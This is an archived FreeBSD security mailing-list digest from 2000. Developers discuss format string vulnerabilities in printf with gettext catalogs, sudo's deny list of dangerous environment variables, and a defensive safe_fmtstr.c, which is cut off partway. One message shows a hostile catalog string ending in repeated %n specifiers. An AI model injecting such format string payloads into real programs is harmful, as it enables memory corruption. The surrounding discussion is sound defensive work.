To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 19:59:45 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 070B137B423; Thu, 7 Sep 2000 19:59:40 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id UAA40578; Thu, 7 Sep 2000 20:59:38 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id UAA50393; Thu, 7 Sep 2000 20:59:18 -0600 (MDT) Message-Id: <200009080259.UAA50393@harmony.village.org> To: "John Doh!" Subject: Re: How to stop problems from printf Cc: security@FreeBSD.ORG, hackers@FreeBSD.ORG In-reply-to: Your message of "Thu, 07 Sep 2000 18:27:57 +0700." References: Date: Thu, 07 Sep 2000 20:59:18 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message "John Doh!" writes: : Issue is must be getting format string from "untrusted" place, but want to : limit substitution of %... to the substitution of say in example the : argv[0], but to not do others so that say given "usage: %s filename %p" %p : not interpret but to be print instead as literally so we get output of : (saying to be argv[0] as test just for example) usage: test filename %p : : any hints you have I am very greatful for. Fix gettext to only allow N arguments in the same order that the original message had. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 20:21:20 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9FB2437B42C; Thu, 7 Sep 2000 20:21:15 -0700 (PDT) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id UAA69687; Thu, 7 Sep 2000 20:21:15 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Thu, 7 Sep 2000 20:21:15 -0700 (PDT) From: Kris Kennaway To: Warner Losh Cc: John Doh! , security@FreeBSD.ORG, hackers@FreeBSD.ORG Subject: Re: How to stop problems from printf In-Reply-To: <200009080259.UAA50393@harmony.village.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 7 Sep 2000, Warner Losh wrote: > In message "John Doh!" writes: > : Issue is must be getting format string from "untrusted" place, but want to > : limit substitution of %... to the substitution of say in example the > : argv[0], but to not do others so that say given "usage: %s filename %p" %p > : not interpret but to be print instead as literally so we get output of > : (saying to be argv[0] as test just for example) usage: test filename %p > : > : any hints you have I am very greatful for. > > Fix gettext to only allow N arguments in the same order that the > original message had. gettext() doesnt take any additional arguments, AFAIK it just munges the string. The argument substitution was being done by printf() in the example given. "usage: %s filename" -> "blurgle: %s flobodob" But if you're looking up in an untrusted catalog, then it could return "blurgle: %s flobodob %n%n%n%n%n" in which case your function might be insecure. The only possibilities I immediately see are: 1) Don't do that (look up in untrusted catalogs) 2) Write a vgettext(char *buf, int size, const char *fmt...) which a) looks up the message in the catalog, b) verifies the returned string has the same number and type of format strings, and c) substitutes the arguments passed to it using vsnprintf() into the passed buffer. The resulting string should then be handled using function("%s", buf) to deal with escaped format strings ("%%s" which would be parsed to %s by the vsnprintf()). I don't think you can do it securely otherwise, unless I'm missing something. The problem is that you want gettext to substitute arguments into the string, but it doesn't do that, and the string it returns has an unknown number of format strings so it's not safe to use in a varargs function. Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 20:52:22 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 8F3D937B42C; Thu, 7 Sep 2000 20:52:16 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id VAA40783; Thu, 7 Sep 2000 21:52:13 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id VAA51001; Thu, 7 Sep 2000 21:52:03 -0600 (MDT) Message-Id: <200009080352.VAA51001@harmony.village.org> To: Kris Kennaway Subject: Re: How to stop problems from printf Cc: John Doh! , security@FreeBSD.org, hackers@FreeBSD.org In-reply-to: Your message of "Thu, 07 Sep 2000 20:21:15 PDT." References: Date: Thu, 07 Sep 2000 21:52:03 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message Kris Kennaway writes: : gettext() doesnt take any additional arguments, AFAIK it just munges the : string. The argument substitution was being done by printf() in the : example given. Right. You know how many args are expected, since you know printf. : The only possibilities I immediately see are: : : 1) Don't do that (look up in untrusted catalogs) : : 2) Write a vgettext(char *buf, int size, const char *fmt...) which a) : looks up the message in the catalog, b) verifies the returned string has : the same number and type of format strings, and c) substitutes the : arguments passed to it using vsnprintf() into the passed buffer. The : resulting string should then be handled using function("%s", buf) to deal : with escaped format strings ("%%s" which would be parsed to %s by the : vsnprintf()). I don't think you can do it securely otherwise, unless I'm : missing something. : : The problem is that you want gettext to substitute arguments into the : string, but it doesn't do that, and the string it returns has an unknown : number of format strings so it's not safe to use in a varargs function. 3) figure out how many args a string needs and forbid strings with more than that in them. It knows from the original number of % args, can apply the printf rules. It would be trivial to write one function to do must of this. You get the number of args in the key, you get the number of args in the new string using the same routine. If the two numbers aren't equal, you return the original key string, or abort. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 20:57:13 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8868037B422; Thu, 7 Sep 2000 20:57:07 -0700 (PDT) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id UAA73640; Thu, 7 Sep 2000 20:57:07 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Thu, 7 Sep 2000 20:57:07 -0700 (PDT) From: Kris Kennaway To: Warner Losh Cc: John Doh! , security@FreeBSD.org, hackers@FreeBSD.org Subject: Re: How to stop problems from printf In-Reply-To: <200009080352.VAA51001@harmony.village.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 7 Sep 2000, Warner Losh wrote: > In message Kris Kennaway writes: > : gettext() doesnt take any additional arguments, AFAIK it just munges the > : string. The argument substitution was being done by printf() in the > : example given. > > Right. You know how many args are expected, since you know printf. > > : The only possibilities I immediately see are: > : > : 1) Don't do that (look up in untrusted catalogs) > : > : 2) Write a vgettext(char *buf, int size, const char *fmt...) which a) > : looks up the message in the catalog, b) verifies the returned string has > : the same number and type of format strings, and c) substitutes the > : arguments passed to it using vsnprintf() into the passed buffer. The > : resulting string should then be handled using function("%s", buf) to deal > : with escaped format strings ("%%s" which would be parsed to %s by the > : vsnprintf()). I don't think you can do it securely otherwise, unless I'm > : missing something. > : > : The problem is that you want gettext to substitute arguments into the > : string, but it doesn't do that, and the string it returns has an unknown > : number of format strings so it's not safe to use in a varargs function. > > 3) figure out how many args a string needs and forbid strings with > more than that in them. It knows from the original number of > % args, can apply the printf rules. It would be trivial to write > one function to do must of this. You get the number of args in the > key, you get the number of args in the new string using the same > routine. If the two numbers aren't equal, you return the original > key string, or abort. It also needs to check they are all of the same type, as changing a %d to a %s for example could conceivably be exploitable. And you would have to forbid escaped % characters as well. Yeah, I think that would be doable. We probably should talk to the gnu gettext guys. Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 21: 3:29 2000 Delivered-To: freebsd-security@freebsd.org Received: from smtp-out1.bellatlantic.net (smtp-out1.bellatlantic.net [199.45.39.156]) by hub.freebsd.org (Postfix) with ESMTP id 0063C37B423; Thu, 7 Sep 2000 21:03:22 -0700 (PDT) Received: from smartsoft.cc (client-209-158-91-204.bellatlantic.net [209.158.91.204]) by smtp-out1.bellatlantic.net (8.9.1/8.9.1) with ESMTP id AAA05747; Fri, 8 Sep 2000 00:03:11 -0400 (EDT) Message-ID: <39B864D5.5BCC24E7@smartsoft.cc> Date: Fri, 08 Sep 2000 00:02:29 -0400 From: Jan Knepper Organization: Smartsoft, LLC X-Mailer: Mozilla 4.75 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: "John Doh!" Cc: bright@wintelcom.net, security@FreeBSD.ORG, hackers@FreeBSD.ORG Subject: Re: How to stop problems from printf References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I don't know what you are doing with the 'gettext' in the call to 'printf'. However for printf usage I would always limit the size of a string being displayed with "%s", thus as "%-.80s" for instance. I would *never* do: printf ( argv [ 0 ] ); Since argv [ 0 ] indeed is untrusted. However: printf ( "%s", argv [ 0 ] ); already is a lot safer. You should not have to worry about any content of argv [ 0 ] other than the length if that ever would be an issue. The content of argv [ 0 ] in this case is not being parsed as a C-format string. However for just displaying strings I would use puts or fputs. I mean why call a heavy duty function as printf when the job can be very easily done with a puts/fputs. HTH Jan "John Doh!" wrote: > >From: Alfred Perlstein > >To: John Doh! > >CC: security@FreeBSD.ORG, hackers@FreeBSD.ORG > >Subject: Re: How to stop problems from printf > >Date: Thu, 7 Sep 2000 19:33:14 -0700 > > > >* John Doh! [000907 19:28] wrote: > > > Hello to you am I C coder who to wish write programs we cannot exploit > >via > > > code such as below. > > > > > > > > > > > main(int argc, char **argv) > > > > { > > > > if(argc > 1) { > > > > printf(gettext("usage: %s filename\n"),argv[0]); > > > > exit(0); > > > > } > > > > printf("normal execution proceeds...\n"); > > > > } > > > > > > Issue is must be getting format string from "untrusted" place, but want > >to > > > limit substitution of %... to the substitution of say in example the > > > argv[0], but to not do others so that say given "usage: %s filename %p" > >%p > > > not interpret but to be print instead as literally so we get output of > > > (saying to be argv[0] as test just for example) usage: test filename %p > > > > > > any hints you have I am very greatful for. > > > >try "%%p" > > > >-Alfred > That is what I would do if I could always control string, but point is input > string is not trusted...how to either validate or else to have printf limit > to its arguments. Any ideas? > > _________________________________________________________________________ > Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com. > > Share information about yourself, create your own public profile at > http://profiles.msn.com. > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Jan Knepper Smartsoft, LLC 88 Petersburg Road Petersburg, NJ 08270 U.S.A. http://www.smartsoft.cc/ http://www.mp3.com/pianoprincess Phone : 609-628-4260 FAX : 609-628-1267 FAX : 303-845-6415 http://www.fax4free.com/ Phone : 020-873-3837 http://www.xoip.nl/ (Dutch) FAX : 020-873-3837 http://www.xoip.nl/ (Dutch) In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 21:14:45 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 8B50D37B422; Thu, 7 Sep 2000 21:14:40 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id WAA40865; Thu, 7 Sep 2000 22:14:38 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id WAA51177; Thu, 7 Sep 2000 22:14:28 -0600 (MDT) Message-Id: <200009080414.WAA51177@harmony.village.org> To: Kris Kennaway Subject: Re: How to stop problems from printf Cc: John Doh! , security@FreeBSD.org, hackers@FreeBSD.org In-reply-to: Your message of "Thu, 07 Sep 2000 20:57:07 PDT." References: Date: Thu, 07 Sep 2000 22:14:28 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message Kris Kennaway writes: : It also needs to check they are all of the same type, as changing a %d to : a %s for example could conceivably be exploitable. And you would have to : forbid escaped % characters as well. Yeah, I think that would be : doable. We probably should talk to the gnu gettext guys. Hmmm, yes, you would have to check as well. I thought I said that originally. No need to forbid %%, however. That's not exploitable unless you nest these things, and then all bets are off. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 22: 2:48 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 879B937B423; Thu, 7 Sep 2000 22:02:45 -0700 (PDT) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id WAA89347; Thu, 7 Sep 2000 22:02:45 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Thu, 7 Sep 2000 22:02:45 -0700 (PDT) From: Kris Kennaway To: Jan Knepper Cc: John Doh! , bright@wintelcom.net, security@FreeBSD.ORG, hackers@FreeBSD.ORG Subject: Re: How to stop problems from printf In-Reply-To: <39B864D5.5BCC24E7@smartsoft.cc> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 8 Sep 2000, Jan Knepper wrote: > I don't know what you are doing with the 'gettext' in the call to 'printf'. Translate the string into a localized version. You can't just printf("%s", gettext(...), args) because the arguments won't be printed, only the raw string returned from gettext will, which contains operators you wanted to be substituted for. See the original example. Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 8 2:56:15 2000 Delivered-To: freebsd-security@freebsd.org Received: from zeta.qmw.ac.uk (zeta.qmw.ac.uk [138.37.6.6]) by hub.freebsd.org (Postfix) with ESMTP id 5CB3837B424; Fri, 8 Sep 2000 02:56:09 -0700 (PDT) Received: from xi.css.qmw.ac.uk ([138.37.8.11]) by zeta.qmw.ac.uk with esmtp (Exim 3.02 #1) id 13XKry-00001i-00; Fri, 08 Sep 2000 10:54:50 +0100 Received: from cgaa180 by xi.css.qmw.ac.uk with local (Exim 1.92 #1) id 13XKrz-00050c-00; Fri, 8 Sep 2000 10:54:51 +0100 X-Mailer: exmh version 2.0.2 2/24/98 To: "Todd C. Miller" Cc: "Vladimir Mencl, MK, susSED" , "Andrey A. Chernov" , Warner Losh , Kris Kennaway , freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG Subject: Re: UNIX locale format string vulnerability (fwd) In-reply-to: Your message of "Thu, 07 Sep 2000 16:15:55 MDT." <200009072215.e87MFtQ24652@xerxes.courtesan.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Fri, 08 Sep 2000 10:54:50 +0100 From: David Pick Message-Id: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Sudo already discards the following: > IFS > LOCALDOMAIN > RES_OPTIONS > HOSTALIASES > LD_* > _RLD* > SHLIB_PATH > LIBPATH > KRB_CONF > KRB5_CONFIG > ENV > BASH_ENV A fair list of not-obviously-related environment variables. (Puts on thinking cap and makes a correlation with packet filter rules.) It would be *much* safer to adopt a "deny all and only allow a list of variables that are known to be safe and wanted" approach rather than a "block the ones we know are unsafe and miss blocking a few we don't know about". -- David Pick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 8 3: 7:52 2000 Delivered-To: freebsd-security@freebsd.org Received: from nenya.ms.mff.cuni.cz (nenya.ms.mff.cuni.cz [195.113.17.179]) by hub.freebsd.org (Postfix) with ESMTP id 3666E37B422; Fri, 8 Sep 2000 03:07:43 -0700 (PDT) Received: from localhost (mencl@localhost) by nenya.ms.mff.cuni.cz (8.9.3+Sun/8.9.1) with ESMTP id MAA08566; Fri, 8 Sep 2000 12:07:18 +0200 (MET DST) Date: Fri, 8 Sep 2000 12:07:18 +0200 (MET DST) From: "Vladimir Mencl, MK, susSED" To: David Pick Cc: "Todd C. Miller" , "Andrey A. Chernov" , Warner Losh , Kris Kennaway , freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG Subject: Re: UNIX locale format string vulnerability (fwd) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 8 Sep 2000, David Pick wrote: > A fair list of not-obviously-related environment variables. (Puts > on thinking cap and makes a correlation with packet filter rules.) > It would be *much* safer to adopt a "deny all and only allow a > list of variables that are known to be safe and wanted" approach > rather than a "block the ones we know are unsafe and miss blocking > a few we don't know about". Yes, that is the correct approach. Probably, sudo should maintain a system-wide list of "good"_and_wanted variables, + there might be a per-command list of variables to pass. However, a system facility to keep on the "issetugid" flag for child processes would help us a lot too - the sanity checks made in the libc should be executed too. What about establishing a convention (if there's none till now) to set an environment variable ISSETUGID in a program like sudo, and passing this variable as a warning indicator to all child processes? Vladimir Mencl To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 8 3:21: 2 2000 Delivered-To: freebsd-security@freebsd.org Received: from lists01.iafrica.com (lists01.iafrica.com [196.7.0.141]) by hub.freebsd.org (Postfix) with ESMTP id E01E637B422; Fri, 8 Sep 2000 03:20:57 -0700 (PDT) Received: from nwl.fw.uunet.co.za ([196.31.2.162]) by lists01.iafrica.com with esmtp (Exim 3.12 #2) id 13XLH8-00024s-00; Fri, 08 Sep 2000 12:20:50 +0200 Received: (from nobody@localhost) by nwl.fw.uunet.co.za (8.8.8/8.6.9) id MAA28789; Fri, 8 Sep 2000 12:20:50 +0200 (SAST) Received: by nwl.fw.uunet.co.za via recvmail id 28757; Fri Sep 8 12:20:26 2000 Received: from sheldonh (helo=axl.fw.uunet.co.za) by axl.fw.uunet.co.za with local-esmtp (Exim 3.16 #1) id 13XLGj-0003xq-00; Fri, 08 Sep 2000 12:20:25 +0200 From: Sheldon Hearn To: "Vladimir Mencl, MK, susSED" Cc: David Pick , freebsd-security@freebsd.org, security-officer@freebsd.org Subject: Re: UNIX locale format string vulnerability (fwd) In-reply-to: Your message of "Fri, 08 Sep 2000 12:07:18 +0200." Date: Fri, 08 Sep 2000 12:20:25 +0200 Message-ID: <15241.968408425@axl.fw.uunet.co.za> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 08 Sep 2000 12:07:18 +0200, "Vladimir Mencl, MK, susSED" wrote: > > It would be *much* safer to adopt a "deny all and only allow a > > list of variables that are known to be safe and wanted" approach > > rather than a "block the ones we know are unsafe and miss blocking > > a few we don't know about". > > Yes, that is the correct approach. So which one of you gentlemen is going to take this up with the sudo developer, Todd Miller ? Or are you both just talking for the sake of being heard? :-) Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 8 3:27:57 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 929FD37B422; Fri, 8 Sep 2000 03:27:55 -0700 (PDT) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id DAA40306; Fri, 8 Sep 2000 03:27:55 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Fri, 8 Sep 2000 03:27:55 -0700 (PDT) From: Kris Kennaway To: Sheldon Hearn Cc: "Vladimir Mencl, MK, susSED" , David Pick , freebsd-security@freebsd.org, security-officer@freebsd.org Subject: Re: UNIX locale format string vulnerability (fwd) In-Reply-To: <15241.968408425@axl.fw.uunet.co.za> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 8 Sep 2000, Sheldon Hearn wrote: > > > It would be *much* safer to adopt a "deny all and only allow a > > > list of variables that are known to be safe and wanted" approach > > > rather than a "block the ones we know are unsafe and miss blocking > > > a few we don't know about". > > > > Yes, that is the correct approach. > > So which one of you gentlemen is going to take this up with the sudo > developer, Todd Miller ? > > Or are you both just talking for the sake of being heard? :-) Erm, he already participated in other parts of the thread, and agreed when I made this suggestion earlier today. *thwack* :-) Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 8 5:49:30 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.euroweb.hu (mail.euroweb.hu [193.226.220.4]) by hub.freebsd.org (Postfix) with ESMTP id 917B737B423; Fri, 8 Sep 2000 05:49:27 -0700 (PDT) Received: (from hu006co@localhost) by mail.euroweb.hu (8.8.5/8.8.5) id OAA05585; Fri, 8 Sep 2000 14:49:23 +0200 (MET DST) Received: (from zgabor@localhost) by CoDe.hu (8.9.3/8.8.8) id OAA00796; Fri, 8 Sep 2000 14:47:07 +0200 (CEST) (envelope-from zgabor) Date: Fri, 8 Sep 2000 14:47:07 +0200 From: Gabor Zahemszky To: freebsd-security@freebsd.org Cc: kris@freebsd.org Subject: Re: UNIX locale format string vulnerability (fwd) Message-ID: <20000908144707.F682@zg.CoDe.hu> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: ; from kris@FreeBSD.ORG on Thu, Sep 07, 2000 at 02:53:51AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Sep 07, 2000 at 02:53:51AM -0700, Kris Kennaway wrote: > HOWEVER: no program shipped in the FreeBSD base system is believed to be > vulnerable to either of these problems. > > They both affect catopen(), and we don't use that function at all except > in tcsh, which is non-privileged. We don't even have any code which has Oops! On my 3.4R system, there is a little utility, named: ee (and ree), and it is using catopen(). I don't think it changed in 4.x, is it? ZGabor at CoDe dot HU -- #!/bin/ksh Z='21N16I25C25E30, 40M30E33E25T15U!' ;IFS=' ABCDEFGHIJKLMNOPQRSTUVWXYZ ';set $Z ;for i { [[ $i = ? ]]&&print $i&&break;[[ $i = ??? ]]&&j=$i&&i=${i%?};typeset -i40 i=8#$i;print -n ${i#???};[[ "$j" = ??? ]]&&print -n "${j#??} "&&j=;typeset +i i;};IFS=' 0123456789 ';set $Z;X=;for i { [[ $i = , ]]&&i=2;[[ $i = ?? ]]||typeset -l i;X="$X $i";typeset +l i;};print "$X" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 8 9:55:38 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.rpi.edu (mail.rpi.edu [128.113.100.7]) by hub.freebsd.org (Postfix) with ESMTP id C3A1737B424; Fri, 8 Sep 2000 09:55:32 -0700 (PDT) Received: from [128.113.24.47] (gilead.acs.rpi.edu [128.113.24.47]) by mail.rpi.edu (8.9.3/8.9.3) with ESMTP id MAA353916; Fri, 8 Sep 2000 12:55:29 -0400 Mime-Version: 1.0 X-Sender: drosih@mail.rpi.edu Message-Id: In-Reply-To: References: Date: Fri, 8 Sep 2000 12:57:08 -0400 To: "John Doh!" , security@FreeBSD.ORG, hackers@FreeBSD.ORG From: Garance A Drosihn Subject: Re: How to stop problems from printf Content-Type: text/plain; charset="us-ascii" ; format="flowed" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 6:27 PM -0400 9/7/00, John Doh! wrote: >Hello to you am I C coder who to wish write programs we cannot >exploit via code such as below. > >> >> main(int argc, char **argv) >> { >> if(argc > 1) { >> printf(gettext("usage: %s filename\n"),argv[0]); >> exit(0); >> } >> printf("normal execution proceeds...\n"); >> } > >Issue is must be getting format string from "untrusted" place, but want >to limit substitution of %... to the substitution of say in example the >argv[0], but to not do others so that say given "usage: %s filename %p" >%p not interpret but to be print instead as literally so we get output >of (saying to be argv[0] as test just for example) >usage: test filename %p Since gettext is getting a string from an untrusted place, you should treat it as you would treat a string being typed in from a user. For the example you give, you know that you are expecting ONE %s argument, and that ONE %s is the only substitution you will allow. So, have gettext return it's value into some string. Then, YOU search that string for '%s'. then you do a printf of: printf("%s%s%s", textBefore%s, argv[0], textAfter%s); For the given example, this is pretty trivial. If you have several different values you will substitute in the string returned by gettext, then it gets a bit more cumbersome. My suggestion is a fine solution for your example (IMO :-), but if you did have more substitutions then I might try some alternate strategy. One has to be careful about buffer overflows in that temp string, of course. --- Garance Alistair Drosehn = gad@eclipse.acs.rpi.edu Senior Systems Programmer or drosih@rpi.edu Rensselaer Polytechnic Institute To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 8 9:58:12 2000 Delivered-To: freebsd-security@freebsd.org Received: from jardan.infowest.com (jardan.infowest.com [216.190.28.251]) by hub.freebsd.org (Postfix) with SMTP id 80E7E37B42C for ; Fri, 8 Sep 2000 09:57:53 -0700 (PDT) From: "Aaron D. Gifford" To: Subject: Re: How to stop problems from printf Message-Id: <20000908165753.80E7E37B42C@hub.freebsd.org> Date: Fri, 8 Sep 2000 09:57:53 -0700 (PDT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Okay, after the "How to stop problems from printf" discussion on freebsd-security, in particular the example using gettext(), I thought I'd see if there wasn't something simple that might work. The below code is a result. Here's an example use: main(int argc, char **argv) { if(argc > 1) { printf(safe_fmtstr("usage: %s filename", gettext("usage: %s filename"), 0), argv[0]); exit(0); } printf("normal execution proceeds..."); } I haven't done much testing yet. There are no guarantees. There's more commentary/documentation in the code below. Aaron out. /* * File: safe_fmtstr.c * Version: 0.9 alpha 1 * * Written by Aaron D. Gifford * * Copyright (c) 2000 Aaron D. Gifford. All rights reserved. * * * You may redistribute and use in source or binary form, with or * without modification provided that credit to the author(s) * remains intact and that the appropriate copyright, license, * and/or disclaimers remain intact. * * THIS SOFTWARE IS PROVIDED BY AARON D. GIFFORD ``AS IS'' AND ANY * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL AARON D. GIFFORD OR * OTHER CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED * OF THE POSSIBILITY OF SUCH DAMAGE. * * * BUG FIXES, COMMENTS, and SUGGESTIONS are always WELCOME! * * Please send bug fixes, suggestions, or comments to: * * Aaron D. Gifford * < m e AT a a r o n g i f f o r d DOT c o m > * * This file should always be available from the web page * at http://www.aarongifford.com/computers/ or on one of * the pages linked thereon. * * * * WHAT IS IT? This file contains implements a method of determining if * two different strings intended for use as format strings with the * printf() family of functions are identical or different with regard * to the format specifiers contained therein. This is accomplished by * "compressing" the format specifier strings to just those characters * that are complete format specifiers or incomplete format specifiers. * The compressed versions of two format strings can thus be compared to * see if they are the same. * * I wrote it just to see if it is possible to make things like the below * snippet safer: * * printf(gettext("Some string %s with %d formatting items."), ...); * * Using this code, you would instead do something like: * * printf(safe_fmtstr("A format %s string %d", * gettext("A format %s string %d"), * MAX_FMT_LEN), ...); * * This code analyzes both passed format strings to make sure that they * match in format specifiers. If they match and if the second passed * format string does not exceed the maximum length, it is considered "safe" * and will be returned by the safe_fmtstr() function. * * The function that does the two-pass format string compression or analysis * is compress_fmtstr(). This function removes all non-format specifier * characters to create a compressed representation of the format string. * Two such compressed strings may then be compared to see if the format * specifiers match. * * The other function herein, scan_fmtstr() is meant for internal use by the * compress_fmtstr() function. It implements a finite state parser that does * the analysis of the format string. * * This code makes several assumptions that may be completely wrong or even * dangerous. Please let me know where I'm wrong and/or where I may be doing * something foolish or insecure. I wrote this code one night just for fun * to see how hard it would be. I based my assumptions on the FreeBSD 4.1 * 